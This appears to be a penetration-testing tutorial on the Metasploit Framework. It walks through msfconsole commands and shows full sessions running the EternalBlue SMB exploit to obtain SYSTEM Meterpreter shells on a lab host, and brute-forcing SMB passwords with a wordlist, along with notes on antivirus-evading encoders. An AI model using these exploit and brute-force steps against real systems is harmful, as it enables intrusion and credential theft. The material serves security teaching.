Metasploit
Metasploit
Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.
Metasploit has two main versions:
- Metasploit Pro: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).
- Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the AttackBox and most commonly used penetration testing Linux distributions.
The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.
The main components of the Metasploit Framework can be summarized as follows;
- msfconsole: The main command-line interface.
- Modules: supporting modules such as exploits, scanners, payloads, etc.
- Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom, pattern_create and pattern_offset.
Main components
While using the Metasploit Framework, you will primarily interact with the Metasploit console. You can launch it from the terminal using the msfconsole command. The console will be your main interface to interact with the different modules of the Metasploit Framework. Modules are small components within the Metasploit framework that are built to perform a specific task, such as exploiting a vulnerability, scanning a target, or performing a brute-force attack.
Before diving into modules, it would be helpful to clarify a few recurring concepts: vulnerability, exploit, and payload.
- Exploit: A piece of code that uses a vulnerability present on the target system.
- Vulnerability: A design, coding, or logic flaw affecting the target system. The exploitation of a vulnerability can result in disclosing confidential information or allowing the attacker to execute code on the target system.
- Payload: An exploit will take advantage of a vulnerability. However, if we want the exploit to have the result we want (gaining access to the target system, read confidential information, etc.), we need to use a payload. Payloads are the code that will run on the target system.
Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers, can be found here.
Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.
Evasion: While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software.
On the other hand, “evasion” modules will try that, with more or less success.
Exploits: Exploits, neatly organized by target system.
NOPs: NOPs (No OPeration) do nothing, literally.
They are represented in the Intel x86 CPU family they are represented with 0x90, following which the CPU will do nothing for one cycle. They are often used as a buffer to achieve consistent payload sizes.
Payloads: Payloads are codes that will run on the target system.
Exploits will leverage a vulnerability on the target system, but to achieve the desired result, we will need a payload. Examples could be; getting a shell, loading a malware or backdoor to the target system, running a command, or launching calc.exe as a proof of concept to add to the penetration test report. Starting the calculator on the target system remotely by launching the calc.exe application is a benign way to show that we can run commands on the target system.
Running command on the target system is already an important step but having an interactive connection that allows you to type commands that will be executed on the target system is better. Such an interactive command line is called a "shell". Metasploit offers the ability to send different payloads that can open shells on the target system.
You will see three different directories under payloads: singles, stagers and stages.
- Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
- Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.
- Stages: Downloaded by the stager. This will allow you to use larger sized payloads.Metasploit has a subtle way to help you identify single (also called “inline”) payloads and staged payloads.generic/shell_reverse_tcpwindows/x64/shell/reverse_tcpBoth are reverse Windows shells. The former is an inline (or single) payload, as indicated by the “_” between “shell” and “reverse”. While the latter is a staged payload, as indicated by the “/” between “shell” and “reverse”.
Post: Post modules will be useful on the final stage of the penetration testing process listed above, post-exploitation.
If you wish to familiarize yourself further with these modules, you can find them under the modules folder of your Metasploit installation.
Msfconsole
Msfconsole is managed by context; this means that unless set as a global variable, all parameter settings will be lost if you change the module you have decided to use. In the example below, we have used the ms17_010_eternalblue exploit, and we have set parameters such as RHOSTS. If we were to switch to another module (e.g. a port scanner), we would need to set the RHOSTS value again as all changes we have made remained in the context of the ms17_010_eternalblue exploit.
Let us look at the example below to have a better understanding of this feature. We will use the MS17-010 “Eternalblue” exploit for illustration purposes.
Once you type the use exploit/windows/smb/ms17_010_eternalblue command, you will see the command line prompt change from msf6 to “msf6 exploit(windows/smb/ms17_010_eternalblue)”. The "EternalBlue" is an exploit allegedly developed by the U.S. National Security Agency (N.S.A.) for a vulnerability affecting the SMBv1 server on numerous Windows systems. The SMB (Server Message Block) is widely used in Windows networks for file sharing and even for sending files to printers. EternalBlue was leaked by the cybercriminal group "Shadow Brokers" in April 2017. In May 2017, this vulnerability was exploited worldwide in the WannaCry ransomware attack.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) >
The module to be used can also be selected with the use command followed by the number at the beginning of the search result line.
The prompt tells us we now have a context set in which we will work. You can see this by typing the show options command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.220.191 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) >
This will print options related to the exploit we have chosen earlier. The show options command will have different outputs depending on the context it is used in. The example above shows that this exploit will require we set variables like RHOSTS and RPORT. On the other hand, a post-exploitation module may only need us to set a SESSION ID (see the screenshot below). A session is an existing connection to the target system that the post-exploitation module will use.
msf6 post(windows/gather/enum_domain_users) > show options
Module options (post/windows/gather/enum_domain_users):
Name Current Setting Required Description
---- --------------- -------- -----------
HOST no Target a specific host
SESSION yes The session to run this module on.
USER no Target User for NetSessionEnum
msf6 post(windows/gather/enum_domain_users) >
The show command can be used in any context followed by a module type (auxiliary, payload, exploit, etc.) to list available modules. The example below lists payloads that can be used with the ms17-010 Eternalblue exploit.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom manual No Custom Payload
1 generic/shell_bind_tcp manual No Generic Command Shell, Bind TCP Inline
2 generic/shell_reverse_tcp manual No Generic Command Shell, Reverse TCP Inline
3 windows/x64/exec manual No Windows x64 Execute Command
4 windows/x64/loadlibrary manual No Windows x64 LoadLibrary Path
5 windows/x64/messagebox manual No Windows MessageBox x64
6 windows/x64/meterpreter/bind_ipv6_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 windows/x64/meterpreter/bind_ipv6_tcp_uuid manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
If used from the msfconsole prompt, the show command will list all modules.
The use and show options commands we have seen so far are identical for all modules in Metasploit.
You can leave the context using the back command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > back
msf6 >
Further information on any module can be obtained by typing the info command within its context.
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by:
Sean Dillon
Dylan Davis
Equation Group
Shadow Brokers
thelightcosine
Available targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit,
part of the FuzzBunch toolkit released by Shadow Brokers. There is a
buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
where a DWORD is subtracted into a WORD. The kernel pool is groomed
so that overflow is well laid-out to overwrite an SMBv1 buffer.
Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
not trigger 100% of the time, and should be run continuously until
triggered. It seems like the pool will get hot streaks and need a
cool down period before the shells rain in again. The module will
attempt to use Anonymous login, by default, to authenticate to
perform the exploit. If the user supplies credentials in the
SMBUser, SMBPass, and SMBDomain options it will use those instead.
On some systems, this module may cause system instability and
crashes, such as a BSOD or a reboot. This may be more likely with
some payloads.
References:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://cvedetails.com/cve/CVE-2017-0143/
https://cvedetails.com/cve/CVE-2017-0144/
https://cvedetails.com/cve/CVE-2017-0145/
https://cvedetails.com/cve/CVE-2017-0146/
https://cvedetails.com/cve/CVE-2017-0147/
https://cvedetails.com/cve/CVE-2017-0148/
https://github.com/RiskSense-Ops/MS17-010
Also known as:
ETERNALBLUE
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Alternatively, you can use the info command followed by the module’s path from the msfconsole prompt (e.g. info exploit/windows/smb/ms17_010_eternalblue). Info is not a help menu; it will display detailed information on the module such as its author, relevant sources, etc.
One of the most useful commands in msfconsole is search. This command will search the Metasploit Framework database for modules relevant to the given search parameter. You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 >
The output of the search command provides an overview of each returned module. You may notice the “name” column already gives more information than just the module name. You can see the type of module (auxiliary, exploit, etc.) and the category of the module (scanner, admin, windows, Unix, etc.). You can use any module returned in a search result with the command use followed by the number at the beginning of the result line. (e.g. use 0 instead of use auxiliary/admin/smb/ms17_010_command)
Another essential piece of information returned is in the “rank” column. Exploits are rated based on their reliability. The table below provides their respective descriptions.
Source: https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking
You can direct the search function using keywords such as type and platform.
For example, if we wanted our search results to only include auxiliary modules, we could set the type to auxiliary. The screenshot below shows the output of the search type:auxiliary telnet command.
msf6 > search type:auxiliary telnet
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/dlink_dir_300_600_exec_noauth 2013-02-04 normal No D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
1 auxiliary/admin/http/netgear_r6700_pass_reset 2020-06-15 normal Yes Netgear R6700v3 Unauthenticated LAN Admin Password Reset
2 auxiliary/dos/cisco/ios_telnet_rocem 2017-03-17 normal No Cisco IOS Telnet Denial of Service
3 auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof 2010-12-21 normal No Microsoft IIS FTP Server Encoded Response Overflow Trigger
4 auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal No Juniper SSH Backdoor Scanner
5 auxiliary/scanner/telnet/brocade_enable_login normal No Brocade Enable Login Check Scanner
6 auxiliary/scanner/telnet/lantronix_telnet_password normal No Lantronix Telnet Password Recovery
7 auxiliary/scanner/telnet/lantronix_telnet_version normal No Lantronix Telnet Service Banner Detection
8 auxiliary/scanner/telnet/satel_cmd_exec 2017-04-07 normal No Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability
9 auxiliary/scanner/telnet/telnet_encrypt_overflow normal No Telnet Service Encryption Key ID Overflow Detection
10 auxiliary/scanner/telnet/telnet_login normal No Telnet Login Check Scanner
11 auxiliary/scanner/telnet/telnet_ruggedcom normal No RuggedCom Telnet Password Generator
12 auxiliary/scanner/telnet/telnet_version normal No Telnet Service Banner Detection
13 auxiliary/server/capture/telnet normal No Authentication Capture: Telnet
Interact with a module by name or index, for example use 13 or use auxiliary/server/capture/telnet
msf6 >
As mentioned earlier, the show options command will list all available parameters. The show options command
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.44.70 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) >
As you can see in the screenshot above, some of these parameters require a value for the exploit to work. Some required parameter values will be pre-populated, make sure you check if these should remain the same for your target. For example, a web exploit could have an RPORT (remote port: the port on the target system Metasploit will try to connect to and run the exploit) value preset to 80, but your target web application could be using port 8080.
In this example, we will set the RHOSTS parameter to the IP address of our target system using the set command.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.165.39
rhosts => 10.10.165.39
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.165.39 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.44.70 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) >
Once you have set a parameter, you can use the show options command to check the value was set correctly.
Parameters you will often use are:
- RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. This will support the CIDR (Classless Inter-Domain Routing) notation (/24, /16, etc.) or a network range (10.10.10.x – 10.10.10.y). You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt, as you can see below.
- RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
- PAYLOAD: The payload you will use with the exploit.
- LHOST: “Localhost”, the attacking machine IP address.
- LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine, and you can set it to any port not used by any other application.
- SESSION: Each connection established to the target system using Metasploit will have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.
You can override any set parameter using the set command again with a different value. You can also clear any parameter value using the unset command or clear all set parameters with the unset all command.
msf5 exploit(windows/smb/ms17_010_eternalblue) > unset all
Flushing datastore...
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) >
You can use the setg command to set values that will be used for all modules. The setg command is used like the set command. The difference is that if you use the set command to set a value using a module and you switch to another module, you will need to set the value again. The setg command allows you to set the value so it can be used by default across different modules. You can clear any value set with setg using unsetg.
The example below uses the following flow:
- We use the ms17_010_eternalblue exploitable
- We set the RHOSTS variable using the
setgcommand instead of the set command - We use the
backcommand to leave the exploit context - We use an auxiliary (this module is a scanner to discover MS17-010 vulnerabilities)
- The
show optionscommand shows the RHOSTS parameter is already populated with the IP address of the target system.
msf5 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > setg rhosts 10.10.165.39
rhosts => 10.10.165.39
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /opt/metasploit-framework-5101/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.10.165.39 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_ms17_010) >
The setg command sets a global value that will be used until you exit Metasploit or clear it using the unsetg command.
Using modules
Once all module parameters are set, you can launch the module using the exploit command. Metasploit also supports the run command, which is an alias created for the exploit command as the word exploit did not make sense when using modules that were not exploits (port scanners, vulnerability scanners, etc.).
The exploit command can be used without any parameters or using the -z parameter.
The exploit -z command will run the exploit and background the session as soon as it opens.
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -z
[*] Started reverse TCP handler on 10.10.44.70:4444
[*] 10.10.12.229:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.12.229:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.12.229:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.12.229:445 - Connecting to target for exploitation.
[+] 10.10.12.229:445 - Connection established for exploitation.
[+] 10.10.12.229:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.12.229:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.12.229:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.12.229:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.12.229:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.12.229:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.12.229:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.12.229:445 - Sending all but last fragment of exploit packet
[*] 10.10.12.229:445 - Starting non-paged pool grooming
[+] 10.10.12.229:445 - Sending SMBv2 buffers
[+] 10.10.12.229:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.12.229:445 - Sending final SMBv2 buffers.
[*] 10.10.12.229:445 - Sending last fragment of exploit packet!
[*] 10.10.12.229:445 - Receiving response from exploit packet
[+] 10.10.12.229:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.12.229:445 - Sending egg to corrupted connection.
[*] 10.10.12.229:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.12.229
[*] Meterpreter session 2 opened (10.10.44.70:4444 -> 10.10.12.229:49186) at 2021-08-20 02:06:48 +0100
[+] 10.10.12.229:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.12.229:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.12.229:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 2 created in the background.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
This will return you the context prompt from which you have run the exploit.
Some modules support the check option. This will check if the target system is vulnerable without exploiting it.
Sessions
Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit.
You can use the background command to background the session prompt and go back to the msfconsole prompt.
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(windows/smb/ms17_010_eternalblue) >
Alternatively, CTRL+Z can be used to background sessions.
The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229)
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229)
msf5 >
To interact with any session, you can use the sessions -i command followed by the desired session number.
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229)
msf5 > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
Example of scanning and bruteforcing smb:
msf6 > search smb_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /media/psf/Home/Downloads/MetasploitWordlist.txt
PASS_FILE => /media/psf/Home/Downloads/MetasploitWordlist.txt
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser penny
SMBUser => penny
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.183.196
RHOSTS => 10.10.183.196
msf6 auxiliary(scanner/smb/smb_login) > RUN
[-] Unknown command: RUN
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.183.196:445 - 10.10.183.196:445 - Starting SMB login bruteforce
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:95',
[!] 10.10.183.196:445 - No active DB -- Credential data will not be saved!
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:98',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:2003',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:2008',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:111111',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:123456',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:12345678',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:1qaz2wsx',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:abc',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:abc123',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:abcd123',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:account',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:admin',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:adminadmin',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:administator',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:admins',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:air',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:alpine',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:Autumn2013',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:autumn2013',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:Autumn2014',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:autumn2014',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:Autumn2015',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:autumn2015',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:Autumn2016',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:autumn2016',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:Autumn2017',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:autumn2017',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:bankbank',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:baseball',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:basketball',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:bird',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:burp',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:change',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:changelater',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:changeme',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:company',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:company!',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:company1',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:company1!',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:company123',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:complex',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:complex1',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:complex2',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:complex3',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:complexpassword',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:database',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:default',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:dev',
